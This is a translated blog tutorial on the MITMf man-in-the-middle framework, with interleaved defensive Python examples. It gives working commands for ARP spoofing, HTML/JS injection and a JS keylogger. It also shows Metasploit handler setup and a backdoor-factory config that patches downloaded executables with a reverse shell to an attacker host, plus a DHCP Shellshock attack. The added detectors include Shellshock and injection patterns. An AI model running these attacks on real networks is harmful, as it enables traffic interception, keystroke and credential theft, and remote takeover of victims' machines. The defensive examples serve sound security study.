New Postures in Network Hijacking: A Brief Guide to MITMf

Source: Internet
Author: User

Disclaimer: This article has a certain offensive nature and is intended only for technical exchange and security education. Do not use it in any environment other than a lab you have built yourself.

0x01 Preface

It is October 1st (the National Day holiday) again, and I think of my friends who have all gone travelling, with wine and beautiful company; thinking of this, I can't help but weep. As the Master said: "If you grew up ugly, read more!" And so this article came about.

0x02 Brief Introduction

The main purpose of this article is to introduce a new man-in-the-middle attack testing framework, MITMf. Its author is byt3bl33d3r, and it is a modified version of the proxy tool sergio-proxy. The tool's address is:

https://github.com/byt3bl33d3r/MITMf

Some introduction to the tool is also in the README of the Git repository. The tool itself is fairly new and I could not find a Chinese guide, so I wrote this article to share it and discuss it with you.

When I first saw the tool, my first impression was that it was nothing more than a collection of man-in-the-middle attacks, a concept that has been discussed to death. But once I actually set up an environment and started playing with it, I found the framework has something to it: its extensibility is very high, and beyond "hijacking", some plugins also play a role in "penetration".

0x03 Tool Configuration

MITMf does not support multiple platforms: although it is written in Python, after playing with it I found that it basically has to run on Linux. So if you want to try it in a Windows environment, consider using a virtual machine; Kali Linux is recommended.

First, clone the whole framework with git:

# git clone https://github.com/byt3bl33d3r/MITMf.git /opt/mitmf/

Then do a simple installation:

cd /opt/mitmf
./install-bdfactory.sh

When that finishes, proceed to the next installation step:

cd bdfactory/
./install.sh

Then, when running it, we will find that MITMf still cannot start and complains that some modules are missing; we install them one by one with pip as the messages instruct.

Note that some module sources are hosted on Google, so pip cannot install them (pefile, for example). In that case download the package from https://pypi.python.org/pypi and install it manually; the install command, run inside the unpacked source directory, is:

python setup.py install

In addition, you need to install the python-nfqueue module manually:

sudo apt-get install python-nfqueue

0x04 Basic Features: Cookie Theft, DNS Hijacking, JS Injection ...

At this point we should be able to start MITMf successfully. Enter ./mitmf.py -h to see the help output:

The tool has the following basic functions:

SSLstrip module

I won't say much about this; everyone understands it. It is enabled by default. I tried to disable SSLstrip with the -d parameter, but it had no effect; this should be a bug in the framework itself.

FilePwn module

Its main role: when the spoofed target tries to download a file, the file is analysed first; executables (PE, ELF) have a backdoor injected, and the result is then handed to the deceived target. I will describe this in detail below.

CacheKill module

Empties the client's cache, which is useful when we need to re-inject a JS file. This function is very useful; for its uses, refer to EtherDream's articles on JS cache poisoning, which I won't elaborate on here.

Spoof module

A very important module: when we use the MITM features, spoofing is absolutely indispensable. It mainly includes ARP, ICMP and DHCP traffic redirection (the three modes cannot be used at the same time), manually specified iptables commands, and so on. The other rules live in configuration files (.cfg) in the config directory under the main directory, where we can make custom configurations. Worth mentioning: a few days ago the tool was also updated with the DHCP variant of the Shellshock ("broken shell") vulnerability, which we can enable with the --shellshock parameter. Below I will also demonstrate this with screenshots.
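The ARP mode of the spoof module works by answering ARP requests so that the victim maps the gateway's IP address to the attacker's MAC address. From the defender's side the tell-tale signs are the gateway's MAC changing, or one MAC suddenly answering for the gateway and for another host. The following watcher is an added example, not code from MITMf or from this article; it runs over a constructed list of ARP replies (the gateway IP and all MACs are made up) and reports both conditions.

```python
# Added example (not part of MITMf or the original article): a minimal ARP
# table watcher that flags the kind of gateway impersonation produced by
# "--spoof --arp". Input is a list of constructed ARP reply records
# (timestamp, sender IP, sender MAC); in a real deployment these would come
# from a packet capture or from periodic dumps of the host's ARP table.
from collections import defaultdict

# Constructed sample: the gateway 192.168.217.2 is legitimately at ...:01;
# later replies claim it lives at de:ad:be:ef:00:01, which also answers for
# 192.168.217.137 (the spoofing host's own address in this sample).
GATEWAY_IP = "192.168.217.2"
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.217.2",   "aa:bb:cc:dd:ee:01"),
    (2.0, "192.168.217.129", "aa:bb:cc:dd:ee:81"),
    (3.0, "192.168.217.2",   "aa:bb:cc:dd:ee:01"),
    (4.0, "192.168.217.2",   "de:ad:be:ef:00:01"),   # gateway MAC changes
    (4.5, "192.168.217.137", "de:ad:be:ef:00:01"),   # same MAC, another IP
    (5.0, "192.168.217.2",   "de:ad:be:ef:00:01"),   # repeat, no new alert
]


def find_arp_conflicts(replies, gateway_ip):
    """Return a list of alert dicts, in order of occurrence.

    kind == "mac_change": the MAC claimed for an IP differs from the one
    seen before (flagged with gateway=True when the IP is the gateway).
    kind == "mac_claims_gateway_and_host": one MAC is now bound to the
    gateway IP and at least one other IP.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append({
                "time": ts, "kind": "mac_change", "ip": ip,
                "old_mac": previous, "new_mac": mac,
                "gateway": ip == gateway_ip,
            })
        ip_to_mac[ip] = mac

        # Only alert when the set of IPs behind this MAC actually grows,
        # so a repeated spoofed reply does not produce duplicate alerts.
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        grew = len(mac_to_ips[mac]) > before
        if grew and len(mac_to_ips[mac]) > 1 and gateway_ip in mac_to_ips[mac]:
            alerts.append({
                "time": ts, "kind": "mac_claims_gateway_and_host",
                "mac": mac, "ips": sorted(mac_to_ips[mac]),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_arp_conflicts(SAMPLE_ARP_REPLIES, GATEWAY_IP):
        print(alert)
```

On a real network the same logic can be fed from the switch's port-security logs or a periodic `arp -a` dump; the stronger mitigation is static ARP entries for the gateway or Dynamic ARP Inspection on the switch, which prevents the binding from changing at all.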

BeEFAutorun module

This module lets the framework connect to BeEF; I think we all know how powerful BeEF is. Once connected to BeEF, the MITM can be combined with browser exploitation, so the functionality is naturally more powerful, and the postures more wretched.

Replace module

This module can be used to replace browsed content, with regular expression support. Note that the module forcibly flushes the cache by default; if you want to keep the cached content, you need to specify the --keep-cache parameter manually.

Inject module

You can inject all kinds of wretched things into the victim's browsed content, such as JS, HTML, pictures, small movies ... It is also a rather useful module, as we will see later.

Browser Profiler plugin

Enumerates the browser plugins of the spoofed machine. It is useful for the early information-gathering stage.

JavaPwn module

Poisons the attacked machine by injecting a jar, after which Metasploit can directly penetrate the machine to a shell (I will also focus on this later). Is there anyone who plays at penetration who doesn't know how powerful Metasploit is? If not, go stand outside for half an hour first (I am a die-hard Metasploit fan).

JavaScript keylogger module

A keylogger JS; it will be introduced later in the article.

APP Cache Poison

App cache poisoning: poison the web application's cache and then carry out attack tests at will. The module is based on Krzysztof Kotowicz's work.

Upsidedownternet

A prank module that flips the victim's browsing world upside down.

The above is a simple introduction to the tool. Many of these features we have played with before, so I have singled out a few to show you.

Injection with the inject module

First we inject some HTML:

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --inject --html-url http://www.freebuf.com

Then we inject a JS file and take a look:

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --inject --js-url http://linvex.xxx.cn/test.js

Then the keylogger JS that ships with the tool; let's look at its effect:

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --jskeylogger

Password interception and DNS hijacking were also tested without any problem; for reasons of space they are not shown.
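What --inject and --jskeylogger do to the victim is append a script reference (or inline script) to HTML responses that the server never sent. A defender who captures responses at the victim, or compares them with what the origin serves over a trusted path, can spot that by listing every script and frame source and flagging hosts outside the site's own allowlist. The parser below is an added example, not code from this article or from MITMf; the sample pages, the allowlist and the host attacker.invalid are constructed for the demonstration.

```python
# Added example (not from the article or the MITMf project): enumerate the
# external script/iframe sources in an HTML document and flag any whose host
# is not on the site's allowlist, plus any non-http(s) scheme such as data:
# or javascript:. Inline <script> bodies are counted so a reviewer can diff
# the count against a clean copy of the page.
from html.parser import HTMLParser
from urllib.parse import urlsplit


class SourceCollector(HTMLParser):
    """Collect src attributes of script/iframe tags and count inline scripts."""

    def __init__(self):
        super().__init__()
        self.sources = []        # list of (tag, src)
        self.inline_scripts = 0
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ("script", "iframe") and attrs.get("src"):
            self.sources.append((tag, attrs["src"]))
        elif tag == "script":
            self._in_inline_script = True

    def handle_data(self, data):
        # HTMLParser delivers the body of a <script> element as one data chunk.
        if self._in_inline_script and data.strip():
            self.inline_scripts += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def foreign_sources(html, allowed_hosts):
    """Return (flagged, inline_count).

    flagged is a list of (tag, src) whose host is outside allowed_hosts or
    whose scheme is not http/https. Relative URLs resolve to the page's own
    origin and are never flagged.
    """
    parser = SourceCollector()
    parser.feed(html)
    parser.close()
    flagged = []
    for tag, src in parser.sources:
        parts = urlsplit(src)
        if parts.scheme not in ("", "http", "https"):
            flagged.append((tag, src))           # data:, javascript:, ...
            continue
        host = parts.hostname
        if host is None:                         # relative URL, same origin
            continue
        if host.lower() not in allowed_hosts:
            flagged.append((tag, src))
    return flagged, parser.inline_scripts


# Constructed sample: a page as the origin serves it, and the same page with
# an extra script tag appended before </body>. attacker.invalid is a
# placeholder host, not a real address.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}
CLEAN_PAGE = (
    '<html><head><script src="/static/app.js"></script>\n'
    '<script src="https://cdn.example.com/lib.js"></script></head>\n'
    '<body><p>hello</p></body></html>'
)
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>", '<script src="http://attacker.invalid/test.js"></script></body>'
)
INLINE_PAGE = "<html><body><script>document.title;</script></body></html>"


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, foreign_sources(page, ALLOWED_HOSTS))
```

The durable fix is on the server side rather than in detection: serve pages only over TLS with HSTS so SSLstrip-style downgrades fail, and ship a Content-Security-Policy whose script-src lists exactly the hosts in the allowlist, which makes the browser itself refuse the injected reference.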

0x05 Advanced Gameplay

The above are some of the basic ways to play, just to give you an idea; the basic functions are the ones we use most. The next part mainly shows how the framework is combined with the powerful Metasploit for "penetration".

(i) Exploiting Java vulnerabilities for attack testing

First, we use the JavaPwn module. This module actually takes the client-side Java exploit payloads from MSF, selected according to the client's Java version, but puts the injection into the ARP-spoofing process instead of the old approach of showing the client a direct URL (something like http://192.168.111.111/UIHSDAVX), which makes the attack look more natural.

Open Metasploit and load the msgrpc module:

# msfconsole
msf > load msgrpc Pass=abc123

Leave the rest at the defaults. Then, on the MITMf side, enter the following command:

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --javapwn --msfip 192.168.217.137

Then we just wait and have a cup of coffee. During this process we can see records of the websites the target has visited, and we also receive feedback when the poisoned HTML is served.

If all goes well, our jar is executed.

At this point it starts running and waits.

Successfully getting the shell

These two screenshots show the shell being obtained successfully. Because the Java on my target is the latest version, the MSF payload cannot exploit it and only generates countless connections on the target, so the pictures here are borrowed.

(ii) Injecting a backdoor into a PE file for penetration

With the FilePwn module, a shell can also be obtained in conjunction with MSF. Briefly, the principle of FilePwn: if, during the ARP spoofing process, the target is detected downloading something, the download link is hijacked; the file is downloaded first, unpacked and analysed; if it is an executable, a backdoor injection is attempted, and if the injection fails the file is simply repackaged. Finally, the resulting file is what the target downloads. The documentation says it supports unpacking both ZIP and tar.gz formats and a variety of executable file types.

Again we open Metasploit and use the handler to start listening:

msfconsole
use exploit/multi/handler
set lhost 192.168.217.137
set lport 1447
run

Before using MITMf we need to edit the configuration file; the injection settings are configured as follows (only the relevant part is shown):

............ SNIP .......
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND  # JUMP/SINGLE/APPEND
HOST = 192.168.217.137
PORT = 1447
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
....... SNIP .......

Next comes MITMf:

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --filepwn

Then we just wait for the target to download the file and execute it.

Finally our target executes the file and MSF gets the shell. Here is the final result:
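Because FilePwn patches the executable in transit (the APPEND patch type in the config above adds bytes to the binary), the file the target receives no longer matches what the publisher shipped. The cheapest defence is to verify a publisher-supplied SHA-256 (or a code signature) before anything is run, including every member of a ZIP, since the module also unpacks archives. The checker below is an added example, not code from this article or from the backdoor factory; the archive, its members and the "publisher manifest" are constructed in memory so it runs offline.

```python
# Added example, not part of the article or of MITMf/BDFactory: verify a
# downloaded file, or every member of a downloaded ZIP, against publisher-
# supplied SHA-256 values before anything is executed. The sample archive and
# the manifest are constructed here in memory; "tool.exe" is just bytes, not
# a real PE file.
import hashlib
import io
import zipfile


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def verify_file(data, expected_sha256):
    """True only when the downloaded bytes hash to the published value."""
    return sha256_bytes(data) == expected_sha256.lower()


def verify_zip(zip_bytes, manifest):
    """Compare each archive member with the manifest {name: sha256}.

    Returns a dict with 'modified' (hash mismatch), 'unexpected' (member not
    in the manifest, e.g. a dropped DLL) and 'missing' (manifest entry absent
    from the archive). An archive is safe to use only when all three are empty.
    """
    result = {"modified": [], "unexpected": [], "missing": []}
    seen = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            seen.add(info.filename)
            digest = sha256_bytes(zf.read(info))
            expected = manifest.get(info.filename)
            if expected is None:
                result["unexpected"].append(info.filename)
            elif expected.lower() != digest:
                result["modified"].append(info.filename)
    result["missing"] = sorted(set(manifest) - seen)
    return result


def build_zip(members):
    """Helper for the constructed sample: pack {name: bytes} into a ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample: what the publisher shipped, and the hashes the publisher
# would list on its download page.
ORIGINAL_MEMBERS = {"tool.exe": b"MZ-original-program-bytes", "README.txt": b"hello"}
MANIFEST = {name: sha256_bytes(data) for name, data in ORIGINAL_MEMBERS.items()}

# The same archive as received through a tampering proxy: the executable has
# extra bytes appended, the README is untouched.
TAMPERED_MEMBERS = dict(ORIGINAL_MEMBERS)
TAMPERED_MEMBERS["tool.exe"] = ORIGINAL_MEMBERS["tool.exe"] + b"-extra-bytes"


if __name__ == "__main__":
    print("original:", verify_zip(build_zip(ORIGINAL_MEMBERS), MANIFEST))
    print("tampered:", verify_zip(build_zip(TAMPERED_MEMBERS), MANIFEST))
```

The manifest must of course reach the verifier over a channel the proxy cannot rewrite (HTTPS with pinning, a signed release file, or out of band); a hash fetched over the same plain HTTP download is just as easy to replace as the binary.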


(iii) Entertaining yourself

Finally, let's look at how Shellshock ("broken shell") works over DHCP.

./mitmf.py --iface eth0 --spoof --dhcp --shellshock

The command to run can be specified with the --cmd parameter.

The question everyone is thinking about is this: our mobile iOS and Android devices are both Unix-based, so if we set up a WiFi hotspot with a DHCP server, what could be gained?
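The DHCP variant works only because some clients hand DHCP option strings (hostname, domain name and the like) to a hook script through environment variables that an unpatched bash then interprets as function definitions. Patching bash closes it; on the network side, a DHCP listener or IDS can flag offers whose string options begin with the Shellshock function prefix. The scanner below is an added example, not code from this article or from MITMf; the two offers are constructed dictionaries of option number to raw bytes, and the command in the suspicious sample is a harmless /bin/true.

```python
# Added example (not from the article or MITMf): scan the string-valued
# options of a DHCP offer for the Shellshock function-definition prefix.
# Offers here are constructed {option_number: bytes} dicts; in a real
# deployment they would be decoded from a capture on the client's interface.
import re

# The bash exported-function prefix "() {" at the start of a value, allowing
# for whitespace. This is the same pattern public IDS signatures key on.
SHELLSHOCK_RE = re.compile(rb"^\s*\(\s*\)\s*\{")


def option_text(raw):
    """Best-effort text rendering of an option value for reporting."""
    return raw.decode("utf-8", errors="replace")


def scan_dhcp_options(options):
    """Return [(option_number, text)] for options carrying the prefix.

    Only bytes-like values are examined; numeric options such as the lease
    time are skipped. Option numbers are reported in ascending order.
    """
    hits = []
    for number, raw in sorted(options.items()):
        if not isinstance(raw, (bytes, bytearray)):
            continue
        if SHELLSHOCK_RE.match(bytes(raw)):
            hits.append((number, option_text(bytes(raw))))
    return hits


def scan_offers(offers):
    """Scan several offers; returns {offer_label: hits} for offers with hits."""
    return {label: hits for label, opts in offers.items()
            if (hits := scan_dhcp_options(opts))}


# Constructed sample offers. Option numbers follow the standard DHCP
# assignments: 1 subnet mask, 3 router, 15 domain name, 51 lease time,
# 114 URL. Values for 1, 3 and 51 are raw binary, the rest are text.
BENIGN_OFFER = {
    1: b"\xff\xff\xff\x00",
    3: b"\xc0\xa8\xd9\x02",
    15: b"lab.example",
    51: b"\x00\x01\x51\x80",
}
SUSPICIOUS_OFFER = {
    1: b"\xff\xff\xff\x00",
    3: b"\xc0\xa8\xd9\x02",
    15: b"() { :; }; /bin/true",     # function prefix, then a harmless command
    114: b"http://lab.example/",
}


if __name__ == "__main__":
    print(scan_offers({"benign": BENIGN_OFFER, "suspicious": SUSPICIOUS_OFFER}))
```

A hit should be treated as an active attack on the segment, since legitimate DHCP servers never emit such values; the alert is also a reminder that the real fix is the bash update, because a client that rejects these strings on one option may still pass them through on another.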

0x06 Summary

This tool is in fact a large collection of man-in-the-middle attack tests with a wide range of functions; it extends to the BeEF framework and the Metasploit interface, making attack-testing postures richer. And by keeping up with the times and adding web application poisoning functions, it gives us more ideas: is a man-in-the-middle attack really as simple as hijacking packets? Can intranet penetration really rely only on overflow-based RCE? Could there be a better way? The answer is YES! :)

The article ends here for now, having briefly introduced several basic functions of MITMf; for further extended tools, read:

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

If there are more fun things, I will continue to share them with you.

0x07 Postscript

The night before writing this article, my roommate watched me test various attack postures and after a while sighed that the network is getting less and less safe: there are pits everywhere, and a moment of carelessness lands you in one. Then we both smiled.
